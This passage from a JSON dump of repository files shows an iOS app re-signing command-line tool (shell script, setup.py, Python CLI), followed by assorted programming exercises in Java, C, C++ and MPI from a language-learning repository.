-d \"${payload_dir}\" ]]; then\n\t\techo \"[×] 工作区未找到 Payload 目录,导出重签名包失败\"\n\t\texit 1\n\tfi\n\n APP=$(find ${workspace} -type d | grep \".app$\" | head -n 1)\n\n\tlocal output_file_ext=\"${output_file##*.}\"\n\n\tif [[ \"${output_file_ext}\" == \"ipa\" ]]; then\n\t echo \"[∞] 正在导出重签名后的应用程序(.ipa) ...\"\n run_at \"${workspace}\" \"zip -qr Target.ipa Payload\"\n run_at \"${workspace}\" \"cp -rf Target.ipa $output_file\"\n echo \"[√] 请前往 ${output_file} 查看生成文件\"\n\telif [[ \"${output_file_ext}\" == \"app\" ]]; then\n\t echo \"[∞] 正在导出重签名后的应用程序(.app) ...\"\n run_at \"${payload_dir}\" \"cp -rf ${APP} $output_file\"\n echo \"[√] 请前往 ${output_file} 查看生成文件\"\n\telse\n\t echo \"[×] 输出文件路径请指定 ipa 或是 app!\"\n\t exit 1\n\tfi\n\n}\n\n######################################################\n#\n# 可选证书都传入,内部做区分,测试催得急,直接CV。有缘人来重写\n#\n######################################################\n# 证书和描述文件\nCERTIFICATE_NAME=\"$1\"\nEMBEDDED_MOBILEPROVISION_FILE=\"$2\"\n\n# 要重签名的程序包,支持 app 和 ipa\nSOURCE_FILE=\"$3\"\n# 重签名完的目标程序包,可以是 app 和 ipa\nTARGET_FILE=\"$4\"\n\n# 创建工作目录\nTMP_WORKSPACE_DIR=\"/tmp/resign-brush-\"$(uuidgen)\ncreate_workspace_dir \"${TMP_WORKSPACE_DIR}\"\n\n# 准备 app 应用程序包,如果是 ipa 则要转成 app 文件\nprepare_app_package \"${TMP_WORKSPACE_DIR}\" \"${SOURCE_FILE}\"\n\n# 检查安装的应用程序包是什么环境\ncheck_aps_environment \"${TMP_WORKSPACE_DIR}\"\n\n# 根据环境确定用什么证书和描述文件\nif [[ \"${APS_ENV}\" == \"development\" ]]; then\n if [[ \"${CERTIFICATE_NAME}\" =~ \"Developer\" ]]; then\n echo \"[√] 检测到传入的应用程序包为开发版本,请确保你的 ${CERTIFICATE_NAME} 证书也为开发证书\"\n else\n echo \"[×] 检测到传入的应用程序包为开发版本,你的证书 ${CERTIFICATE_NAME} 非开发证书,不符合要求!\"\n fi\nelse\n if [[ \"${CERTIFICATE_NAME}\" =~ \"Distribution\" ]]; then\n echo \"[√] 检测到传入的应用程序包为发布版本,请确保你的 ${CERTIFICATE_NAME} 证书也为发布证书\"\n else\n echo \"[×] 检测到传入的应用程序包为发布版本,你的证书 ${CERTIFICATE_NAME} 非发布证书,不符合要求!\"\n fi\n\nfi\n\n# 查询可签名证书(配置文件用默认自带的)\nverify_certificate \"${CERTIFICATE_NAME}\"\n\n# 检查描述文件命名是否正确,是否存在\ncheck_provision_file \"${EMBEDDED_MOBILEPROVISION_FILE}\"\n\n# 
重签名\nresign \"${CERTIFICATE_NAME}\" \"${EMBEDDED_MOBILEPROVISION_FILE}\" \"${TMP_WORKSPACE_DIR}\" \"${SOURCE_FILE}\"\n\n# 将重签名的程序包放到指定位置,若为 ipa 还需要做一个转换\noutput_target_file \"${TMP_WORKSPACE_DIR}\" \"${TARGET_FILE}\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.555831253528595, "alphanum_fraction": 0.5682381987571716, "avg_line_length": 21.38888931274414, "blob_id": "d0b54900db934cedd3b1cd7d8043de4ad7a490e1", "content_id": "a911df80ab2032d53b43341a4036f0ffc5da8adb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 403, "license_type": "permissive", "max_line_length": 50, "num_lines": 18, "path": "/setup.py", "repo_name": "colourful987/resign-brush", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nsetup(\n name='resign-brush',\n version='1.0.0',\n author='pmst',\n author_email='[email protected]',\n # url='https://',\n packages=find_packages(),\n package_data={'': ['cert/*', 'bin/*.sh']},\n install_requires=[\n ],\n python_requires=\">=3.6\",\n entry_points={'console_scripts': [\n 'resign-brush = resign_brush:brush_entry',\n ]}\n\n)\n" }, { "alpha_fraction": 0.26279863715171814, "alphanum_fraction": 0.32081910967826843, "avg_line_length": 20.69230842590332, "blob_id": "c113ecbb867c4f0e1b8bd0822070b79f5fd92c58", "content_id": "036d5e2855c944ffe6f217671b66f6c0a15d6310", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 297, "license_type": "permissive", "max_line_length": 49, "num_lines": 13, "path": "/__version__.py", "repo_name": "colourful987/resign-brush", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n-------------------------------------------------\r\n File Name: __version__\r\n Description :\r\n Author : pmst\r\n CreateDate: 2020/19/25 20:58\r\n-------------------------------------------------\r\n\"\"\"\r\n\r\n__version__ = '1.0.0'" }, { 
"alpha_fraction": 0.7237569093704224, "alphanum_fraction": 0.7237569093704224, "avg_line_length": 24.809524536132812, "blob_id": "6f5242843308b08ab042533eddab1979b505bf52", "content_id": "e152b1b13b9d231058456e38cc830b081f22d803", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 605, "license_type": "permissive", "max_line_length": 64, "num_lines": 21, "path": "/configs/brush_configs.py", "repo_name": "colourful987/resign-brush", "src_encoding": "UTF-8", "text": "import os\n\n# 配置文件完整路径\nBRUSH_CONFIGS_FILE_PATH = os.path.abspath(__file__)\n\n# 配置文件目录\nBRUSH_CONFIGS_DIR = os.path.dirname(BRUSH_CONFIGS_FILE_PATH)\n\n# 工作区目录\nBRUSH_WORKSPACE = os.path.dirname(BRUSH_CONFIGS_DIR)\n\n# bin 目录\nBRUSH_BIN_DIR = os.path.join(BRUSH_WORKSPACE, \"bin\")\n\n# brush core 目录\nBRUSH_CORE_DIR = os.path.join(BRUSH_WORKSPACE, \"brush_core\")\n\n# 证书 描述文件目录\nBRUSH_CERT_DIR = os.path.join(BRUSH_WORKSPACE, \"cert\")\nBRUSH_CERT_DEBUG_DIR = os.path.join(BRUSH_CERT_DIR, \"debug\")\nBRUSH_CERT_INHOUSE_DIR = os.path.join(BRUSH_CERT_DIR, \"inhouse\")\n\n" }, { "alpha_fraction": 0.6043605804443359, "alphanum_fraction": 0.61024010181427, "avg_line_length": 30.64341163635254, "blob_id": "6793b9dc887cc5ce32873ebace4873d2f916863a", "content_id": "c59992a8c8297a47a7fa78ae6dbd86851ea14c2f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4485, "license_type": "permissive", "max_line_length": 153, "num_lines": 129, "path": "/resign_brush.py", "repo_name": "colourful987/resign-brush", "src_encoding": "UTF-8", "text": "import argparse\nimport subprocess\nimport sys\nimport re\nfrom configs.brush_configs import *\n\n\ndef run_shell(shell):\n cmd = subprocess.Popen(shell, stdin=subprocess.PIPE, stderr=sys.stderr, close_fds=True,\n stdout=sys.stdout, universal_newlines=True, shell=True, bufsize=1)\n cmd.communicate()\n return cmd.returncode\n\n\ndef 
find_executable(executable):\n path = os.environ['PATH']\n paths = path.split(os.pathsep)\n base, ext = os.path.splitext(executable)\n if sys.platform == 'win32' and not ext:\n executable = executable + '.exe'\n\n if os.path.isfile(executable):\n return executable\n\n for p in paths:\n full_path = os.path.join(p, executable)\n if os.path.isfile(full_path):\n return full_path\n\n return None\n\n\ndef doctor_check_required_cmds():\n find_res = find_executable(\"ios-deploy\")\n if find_res is None:\n print('[×] ios-deploy is not installed, You can use homebrew install it easily.')\n else:\n print('[√] ios-deploy is installed, locate in {cmd}'.format(cmd=find_res))\n\n find_res = find_executable(\"ideviceinstaller\")\n if find_res is None:\n print('[×] libimobiledevice is not installed, You can use homebrew install it easily.')\n else:\n print('[√] libimobiledevice is installed, locate in {cmd}'.format(cmd=find_res))\n\n\ndef doctor_check_certificats():\n cmd = \"security find-identity -v -p codesigning\"\n (status, output) = subprocess.getstatusoutput(cmd)\n if status != 0:\n print('[×] security find-identity failed')\n return\n\n ids = {}\n for current in output.split(\"\\n\"):\n sha1obj = re.search(\"[a-zA-Z0-9]{40}\", current)\n nameobj = re.search(\".*\\\"(.*)\\\"\", current)\n\n if sha1obj is None or nameobj is None:\n continue\n sha1 = sha1obj.group()\n name = nameobj.group(1)\n ids[sha1] = name\n\n print(\"\\t------------------------------------ Identity List -----------------------------------\")\n for name in ids:\n print(\"\\t{name} : {sha1}\".format(name=name, sha1=ids[name]))\n print(\"\\t--------------------------------------------------------------------------------------\")\n\n\ndef run_doctor(args):\n \"\"\"\n 检查环境配置:内置证书是否安装,ios-deploy 和 libimobiledevice 三方库是否安装\n :param args:\n :return:\n \"\"\"\n # 检查 ios-deploy 和 libimobiledevice\n doctor_check_required_cmds()\n\n # 检查证书是否安装\n doctor_check_certificats()\n\n\ndef fast_resign(args):\n resign_script = 
os.path.join(BRUSH_BIN_DIR, \"fast-resign-brush.sh\")\n\n certificate = args.cert\n prov_file = args.provision\n\n cmd = 'sh \"{script}\" \"{cert}\" \"{provision}\" \"{app}\" \"{output}\"'.format(\n script=resign_script,\n cert=certificate,\n provision=prov_file,\n app=args.app,\n output=args.output)\n\n status = run_shell(cmd)\n\n if status == 0:\n print(\"✿✿ヽ(°▽°)ノ✿ 重签名成功\")\n else:\n print(\"(灬ꈍ ꈍ灬) 重签名失败\")\n exit(status)\n\n\ndef brush_entry():\n \"\"\"\n 脚本选项解析,当前支持 doctor, resign 选项\n \"\"\"\n parser = argparse.ArgumentParser()\n sub_parsers = parser.add_subparsers()\n\n doctor_parser = sub_parsers.add_parser(\"doctor\", help=\"检查 resign brush 依赖环境\")\n doctor_parser.set_defaults(callback=run_doctor)\n doctor_parser.add_argument(\"--verbose\", action=\"store_true\", help=\"输出详细的检查日志\")\n\n fast_resign_parser = sub_parsers.add_parser(\"fast-resign\", help=\"使用证书和描述文件重签名应用程序包\")\n fast_resign_parser.set_defaults(callback=fast_resign)\n fast_resign_parser.add_argument(\"-c\", \"--cert\", help=\"请输入有效签名的开发证书或发布证书名,支持企业证书(299$),公司证书(99$,非下面分配的开发者证书),独立开发者证书(99$,仅此一号)\", required=True)\n fast_resign_parser.add_argument(\"-p\", \"--provision\", help=\" 配套的描述文件(embedded.mobileprovision)路径,unzip your app to search and get it.\", required=True)\n fast_resign_parser.add_argument(\"-a\", \"--app\", help=\"原始应用程序包文件路径,支持 .ipa 和 .app 格式\", required=True)\n fast_resign_parser.add_argument(\"-o\", \"--output\", help=\"签名后的程序包,支持 .ipa 和 .app 格式\", required=True)\n\n args = parser.parse_args()\n args.callback(args)\n\n\nif __name__ == '__main__':\n brush_entry()\n" } ]
6
jean-edouard-boulanger/UTC-Bloomberg-Code.B
https://github.com/jean-edouard-boulanger/UTC-Bloomberg-Code.B
f51fc7c7289994b5ea6aa5b17667539afa83bd0e
8d1cbc33d23dae2139ce298db6a19c8e8395da6d
a093ca70b844c203a23e468efbf04fc268379b19
refs/heads/master
2016-09-15T21:06:15.503897
2015-03-22T21:15:22
2015-03-22T21:15:22
32,606,709
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6020997166633606, "alphanum_fraction": 0.6146981716156006, "avg_line_length": 26.22857093811035, "blob_id": "cfe7045ad7f6a21480cf30acfebab7e3cd273fbc", "content_id": "a3a45c338b7d7fa3c02ffe13c017a3fbca86a2aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1905, "license_type": "no_license", "max_line_length": 95, "num_lines": 70, "path": "/7-which-books-to-read/solution.py", "repo_name": "jean-edouard-boulanger/UTC-Bloomberg-Code.B", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\n\ndef count_books_to_read(friends, source, books, max_separation_degree):\n explored = []\n books_to_read = []\n books_already_read = []\n\n to_explore = [source]\n to_explore_count = 1\n current_degree = 0\n\n if source in books:\n books_already_read += books[source]\n\n while len(to_explore) > 0 and current_degree <= max_separation_degree:\n\n current_person = to_explore.pop()\n if current_person in friends:\n current_person_friends = friends[current_person]\n for friend in current_person_friends:\n if friend not in explored:\n to_explore.insert(0, friend)\n\n if current_person in books:\n current_person_books = books[current_person]\n for book in current_person_books:\n if book not in books_already_read and book not in books_to_read:\n books_to_read.append(book)\n\n to_explore_count -= 1\n if to_explore_count == 0:\n current_degree += 1\n to_explore_count = len(to_explore)\n\n return len(books_to_read)\n\n\n\ndata = sys.stdin.readlines()\n\nsource = data[0].rstrip()\nmax_separation_degree = int(data[1].rstrip())\nlinks_count = int(data[2].rstrip())\nbook_lists_count = int(data[3].rstrip())\n\nfriends = dict()\nlinks = [link.rstrip() for link in data[4:4 + links_count]]\n\nfirst_book_idx = 4 + links_count\nbooks_read = [book.rstrip() for book in data[first_book_idx:first_book_idx + book_lists_count]]\n\nfor link in links:\n real_link = link.split(\"|\")\n p1 = real_link[0]\n p2 = 
real_link[1]\n if p1 not in friends:\n friends[p1] = []\n friends[p1].append(p2)\n\nbooks = dict()\nfor book_link in books_read:\n real_book_link = book_link.split(\"|\")\n p = real_book_link[0]\n books[p] = real_book_link[1:]\n\n\nprint count_books_to_read(friends, source, books, max_separation_degree)" }, { "alpha_fraction": 0.6177908182144165, "alphanum_fraction": 0.6295210123062134, "avg_line_length": 21.755556106567383, "blob_id": "928e5e2a4668bb3a09d38ea3c825cdc08c727923", "content_id": "8187ccfc9f98e487559e029847e9db639dd450bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1023, "license_type": "no_license", "max_line_length": 61, "num_lines": 45, "path": "/4-elevators/solution.py", "repo_name": "jean-edouard-boulanger/UTC-Bloomberg-Code.B", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\n\ndata = sys.stdin.readlines()\n\ntop_floor_number = int(data[0])\nelevators = data[2:]\n\nfor i in range(0, len(elevators)):\n elevators[i] = [int(x) for x in elevators[i].split()]\n\nreachable_floors = dict()\nfor elevator in elevators:\n for floor in elevator:\n if floor not in reachable_floors:\n reachable_floors[floor] = []\n reachable_floors[floor] += elevator\n reachable_floors[floor].remove(floor)\n\nto_explore = [0]\nto_explore_count = 1\ndepth = 0\n\nexplored = []\nrides_count = 0\nwhile len(to_explore) > 0:\n\n current_floor = to_explore.pop()\n\n if current_floor == top_floor_number:\n print str(depth)\n break\n\n next_floors = reachable_floors[current_floor]\n for floor in next_floors:\n if floor not in explored and floor not in to_explore:\n to_explore.insert(0, floor)\n\n explored += [current_floor]\n to_explore_count -= 1\n if to_explore_count == 0:\n to_explore_count = len(to_explore)\n depth += 1" }, { "alpha_fraction": 0.4915032684803009, "alphanum_fraction": 0.5045751929283142, "avg_line_length": 20.885713577270508, "blob_id": "66af9c9b715cf5001832f0606150f3b77e451234", 
"content_id": "0101d74ece6027d5c2a03dec171140de5d0f0bdb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 765, "license_type": "no_license", "max_line_length": 62, "num_lines": 35, "path": "/3-alice-swamp/solution.py", "repo_name": "jean-edouard-boulanger/UTC-Bloomberg-Code.B", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\ndata = sys.stdin.readlines()\nlines = data[1:]\ngrid = []\nfor line in lines:\n cells = [int(x) for x in line.split(\" \")]\n grid.append(cells)\n\nN = len(grid)\n\nfor y in reversed(range(0, N)):\n for x in reversed(range(0, N)):\n if x == y == (N - 1):\n continue\n\n min_cost = sys.maxint\n current_cell_cost = grid[y][x]\n\n if x < N - 1:\n hor_move_cost = current_cell_cost + grid[y][x + 1]\n\n if hor_move_cost < min_cost:\n min_cost = hor_move_cost\n\n if y < N - 1:\n ver_move_cost = current_cell_cost + grid[y + 1][x]\n if ver_move_cost < min_cost:\n min_cost = ver_move_cost\n\n grid[y][x] = min_cost\n\nprint grid[0][0]" }, { "alpha_fraction": 0.6018957495689392, "alphanum_fraction": 0.6161137223243713, "avg_line_length": 20.149999618530273, "blob_id": "66585b8a4d67f108e0850118e5552eddeb2833a3", "content_id": "a0ee5935f7971f3b986991728e46db69ab350829", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 422, "license_type": "no_license", "max_line_length": 58, "num_lines": 20, "path": "/1-tripple-check/solution.py", "repo_name": "jean-edouard-boulanger/UTC-Bloomberg-Code.B", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\ndata = sys.stdin.readlines()\nwords = data[1:]\n\nword_length = len(words[0]) - 1\nresult_word = \"\"\n\nfor i in range(0, word_length):\n letter_count = dict()\n for word in words:\n letter = word[i]\n if letter not in letter_count:\n letter_count[letter] = 0\n letter_count[letter] += 1\n result_word += max(letter_count, key=letter_count.get)\n\nprint(result_word)" }, { 
"alpha_fraction": 0.5869565010070801, "alphanum_fraction": 0.6014492511749268, "avg_line_length": 15.853658676147461, "blob_id": "970eadd760ace73181864dbc98385976ced0d989", "content_id": "0d88ed1466658268f140a296db81ca5a26a0ec30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 690, "license_type": "no_license", "max_line_length": 39, "num_lines": 41, "path": "/5-matching-gloves/solution.py", "repo_name": "jean-edouard-boulanger/UTC-Bloomberg-Code.B", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\n\ndef is_palindrome(word):\n return word == reverse(word)\n\n\ndef reverse(word):\n return word[::-1]\n\ndata = sys.stdin.readlines()\nN = int(data[0])\ngloves = [x.rstrip() for x in data[1:]]\n\ngloves_count = dict()\n\nfor glove_name in gloves:\n\n if is_palindrome(glove_name):\n continue\n\n key = glove_name\n if key not in gloves_count:\n key = reverse(glove_name)\n\n if key not in gloves_count:\n gloves_count[key] = 1\n else:\n gloves_count[key] += 1\n\n\ntotal_pair_gloves = 0\nfor k, v in gloves_count.items():\n if v % 2 > 0:\n total_pair_gloves = -1\n break\n total_pair_gloves += v / 2\n\nprint total_pair_gloves" }, { "alpha_fraction": 0.5403226017951965, "alphanum_fraction": 0.5564516186714172, "avg_line_length": 17.649999618530273, "blob_id": "3ad08bf7c3bf88bf4b7e766d2f3e68e039bc179f", "content_id": "4640d41ecb2313cb20b5a6730766d8c31dfa6139", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 372, "license_type": "no_license", "max_line_length": 44, "num_lines": 20, "path": "/2-twin-primes/solution.py", "repo_name": "jean-edouard-boulanger/UTC-Bloomberg-Code.B", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\n\ndef is_prime(mx):\n for d in range(2, mx):\n if mx % d == 0:\n return False\n return True\n\n\ndef largest_twin_primes(ubound):\n for x in reversed(range(3, ubound + 1)):\n if is_prime(x) and is_prime(x 
- 2):\n return str(x - 2) + \",\" + str(x)\n\n\nK = int(sys.stdin.readline())\nprint(largest_twin_primes(K))" } ]
6
jskyzero/Languages
https://github.com/jskyzero/Languages
5e26c224c9e70da3476312146c97b5738b6a7ee9
2769d56a6ba95da0301acdee06f1e21eebcf44c4
6f03f61d8b2e0669294a54686f1bca6649e0fa4b
refs/heads/master
2018-10-27T01:22:30.529386
2018-10-26T02:39:28
2018-10-26T02:39:28
139,727,781
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7030878663063049, "alphanum_fraction": 0.7268408536911011, "avg_line_length": 30.22222137451172, "blob_id": "5e3df8e727fd071e0f605affb14255c75f332b37", "content_id": "1895e19e36f2fc0efb6470d9e3dd2e2d9180f687", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1470, "license_type": "permissive", "max_line_length": 121, "num_lines": 27, "path": "/java/hardwork/hardway/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "## 面向对象基本概念\n1. 对象,对象是一个状态和行为的`software bundle`。\n2. 类,类是创建对象的蓝图或者原型。\n3. 继承,集成提供了一种强大而自然的方式来组织和结构化你的软件。\n4. 接口,接口是类和外界间的`contract`。\n5. 包,包是用逻辑方式组织类和接口的一个命名空间。\n\n\n### 语言基础\n1. 变量分类,实例/类变量(非静态/静态),本地变量,参数\n2. 变量命名,避免以`_`和`$`开头,不要使用缩写,多个单词第一个小写其余大写开头,常量全大写用下划线连接。E.G.`static final int NUM_GEARS = 6`\n3. 主要数据类型,默认值,赋值方法,请参考[这个](http://docs.oracle.com/javase/tutorial/java/nutsandbolts/datatypes.html)\n4. 数组,初始化,拷贝`System.arraycopy(Object src, int srcPos, Object dest, int destPos, int length)`,`java.util.Array`中有更多对数组的操作。\n5. 操作符。\n6. 控制流`if else`, `switch`, `while`, `for`, `break`, `continue`, `return`\n\n### 类和对象\n1. 类,声明属性/方法\n2. 对象,使用类创造对象\n3. 嵌套类,匿名类(声明即使用)\n4. Lambda表达式\n5. 枚举类型\n\n### 注解\n1. 格式,`@SuppressWarnings(value = \"unchecked\")`\n2. 何时应该使用,在声明类,域,方法和其他程序元素的时候\n3. 
其余部分请参考[源介绍](http://docs.oracle.com/javase/tutorial/java/annotations/declaring.html)" }, { "alpha_fraction": 0.666208803653717, "alphanum_fraction": 0.6703296899795532, "avg_line_length": 17.225000381469727, "blob_id": "f6b1e01d2f69c7f6fe66790f00199b6d5dd0f932", "content_id": "96aaf3b1676928aae377696fc272aa3721cd1d04", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 728, "license_type": "permissive", "max_line_length": 59, "num_lines": 40, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week15/Classes/Global.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include \"Global.h\"\n\n#include <regex>\nusing std::regex;\nusing std::match_results;\nusing std::regex_match;\nusing std::cmatch;\n\nstring Global::gameSessionId = \"\";\nlong Global::score = 0;\n\nGlobal::Global()\n{\n}\n\nGlobal::~Global()\n{\n}\n\nstring Global::vectorChar2String(vector<char> *buffer) {\n\tstring rst;\n\tfor (char ch : *buffer) {\n\t\trst.push_back(ch);\n\t}\n\treturn rst;\n}\n\nstring Global::getSessionIdFromHeader(string head) {\n\tregex nlp(\"\\\\r\\\\n\");\n\tstring header = regex_replace(head, nlp, \" \");\n\tregex pattern(\".*GAMESESSIONID=(.*) Content-Type.*\");\n\t//match_results<std::string::const_iterator> result;\n\tcmatch result;\n\tbool valid = regex_match(header.c_str(), result, pattern);\n\n\tif (!valid) {\n\t\treturn \"\";\n\t}\n\treturn result[1];\n}" }, { "alpha_fraction": 0.35433071851730347, "alphanum_fraction": 0.3818897604942322, "avg_line_length": 17.14285659790039, "blob_id": "4c8c26e55f50b76eb7b0d250da5ade89ab520bab", "content_id": "33c48ded3166c177204431e7e1a51e464f1ab9e5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 508, "license_type": "permissive", "max_line_length": 50, "num_lines": 28, "path": "/c/hardwork/hardway/sort_acs(bubble).c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": 
"#include <stdio.h> // for scanf() printf()\n\nint *sortAsc(int *n, int _n) {\n int temp;\n for (int i = 0; i < _n - 1; i++) {\n for (int j = 0; j < _n - 1; j++) {\n if (n[j] > n[j + 1]) {\n temp = n[j + 1];\n n[j + 1] = n[j];\n n[j] = temp;\n }\n }\n }\n return n;\n}\n\nint main() {\n int arr[5];\n int j;\n for (j = 0; j < 5; j++) {\n scanf(\"%d\", &arr[j]);\n }\n int *p = sortAsc(arr, 5);\n int i;\n for (i = 0; i < 5; i++) printf(\"%d \", *(p + i));\n printf(\"\\n\");\n return 0;\n}\n" }, { "alpha_fraction": 0.739130437374115, "alphanum_fraction": 0.7639751434326172, "avg_line_length": 31.399999618530273, "blob_id": "a9c242e26252fbfdf7d1acffca6e364a8a001f93", "content_id": "a0d30cc9623340658df72840e7b64b28ca9b11b6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 161, "license_type": "permissive", "max_line_length": 73, "num_lines": 5, "path": "/c/projects/socket/UDP/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "use `bash make` to compile\n\nin my computer, only 15.28% of UDP package can be received\n\nas about the reasons, maybe the buffer size is full then it begins lost(X" }, { "alpha_fraction": 0.6109660863876343, "alphanum_fraction": 0.6214098930358887, "avg_line_length": 22.24242401123047, "blob_id": "a7579e249e216c0902003e5a8f8a455d448a1124", "content_id": "2d958e7527bd78c79d0a695bc792a6887e676ef3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 830, "license_type": "permissive", "max_line_length": 65, "num_lines": 33, "path": "/c/projects/MPI/hardway/MPI_group_create.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 基于已经存在的进程组创建一个新的组,并指明被包含(included)其中的成员进程。\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs, odd_rank;\n MPI_Group group_world, odd_group;\n int i;\n int members[10];\n\n MPI_Init(&argc, &argv);\n\n 
MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n for (i = 0; i < numprocs / 2; i++) {\n members[i] = 2 * i + 1;\n }\n\n // int MPI_Group_incl(MPI_Group old_group, int count, \n // int *members, MPI_Group *new_group)\n MPI_Group_incl(group_world, numprocs / 2, members, &odd_group);\n\n MPI_Group_rank(odd_group, &odd_rank);\n\n printf(\"In process %d: odd rank is %d\\n\", myid, odd_rank);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.6179310083389282, "alphanum_fraction": 0.6183907985687256, "avg_line_length": 29.22222137451172, "blob_id": "55f67548b3205076d425a8afaa5da03811cb19bc", "content_id": "fe5c0b684a9edee63ccbb4b85799162b2e8a8ec7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2175, "license_type": "permissive", "max_line_length": 109, "num_lines": 72, "path": "/java/projects/todolist/src/main/java/TodoList/Controller.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "package TodoList;\n\nimport java.io.IOException;\nimport java.lang.reflect.Array;\nimport java.lang.reflect.Type;\nimport java.nio.charset.Charset;\nimport java.nio.file.FileAlreadyExistsException;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.*;\nimport java.util.stream.Collectors;\n\nimport com.google.gson.Gson;\nimport com.google.gson.GsonBuilder;\nimport com.google.gson.reflect.TypeToken;\nimport org.omg.PortableInterceptor.SYSTEM_EXCEPTION;\n\npublic class Controller {\n\n List<Note> notes;\n static final String fileName = \"notes.json\";\n\n public Controller() {\n Gson gson = new GsonBuilder().setPrettyPrinting().create();\n Path filePath = Paths.get(fileName);\n Type collectionType = new TypeToken<LinkedList<Note>>() {}.getType();\n try {\n notes = gson.fromJson(\n Files.readAllLines(filePath).stream().collect(Collectors.joining(\"\\n\")), 
collectionType);\n if (notes == null) throw new IOException(\"Empty file\");\n System.out.println(\"Read data\");\n } catch (IOException e) {\n notes = new LinkedList<Note>();\n System.out.println(\"Initial data\");\n }\n }\n\n public void addNote(String title, String content) {\n notes.add(new Note(title, content));\n }\n\n public void deleteNote(String title) {\n notes.removeIf(note -> note.title.equals(title));\n }\n\n public void printAllNote() {\n // System.out.println(notes);\n for (Note note : notes) {\n note.print();\n }\n }\n\n public void saveData() {\n Gson gson = new GsonBuilder().setPrettyPrinting().create();\n try {\n\n try {\n Files.createFile(Paths.get(fileName));\n System.out.println(\"Create data\");\n } catch (FileAlreadyExistsException e) {\n System.out.println(\"Update data\");\n }\n Files.write(Paths.get(fileName),\n new ArrayList<String>(Arrays.asList(gson.toJson(notes).split(\"\\n\"))),\n Charset.forName(\"UTF-8\"));\n } catch (IOException e) {\n e.printStackTrace();\n }\n\n }\n}" }, { "alpha_fraction": 0.3653465211391449, "alphanum_fraction": 0.41485148668289185, "avg_line_length": 16.11864471435547, "blob_id": "c671c8e3bc3df857689095cd2abe3f89da158f9a", "content_id": "155e785ae055e0efadd1a4e25f956736580a99d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1010, "license_type": "permissive", "max_line_length": 49, "num_lines": 59, "path": "/c/hardwork/hardway/sort_string(index).c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf()\n#include <string.h> // for printf()\n\nint a[128];\nchar *sortString(const char *const s) {\n int n = strlen(s);\n static char str[100005];\n\n for (int i = 0; i < 128; i++) {\n a[i] = 0;\n }\n\n for (int i = 0; i < n; i++) {\n a[s[i]]++;\n }\n int j = 0;\n for (int i = 0; i < 128; i++) {\n while (a[i] != 0) {\n str[j] = i;\n a[i]--;\n j++;\n }\n }\n return str;\n}\nvoid sortString2(const char *const 
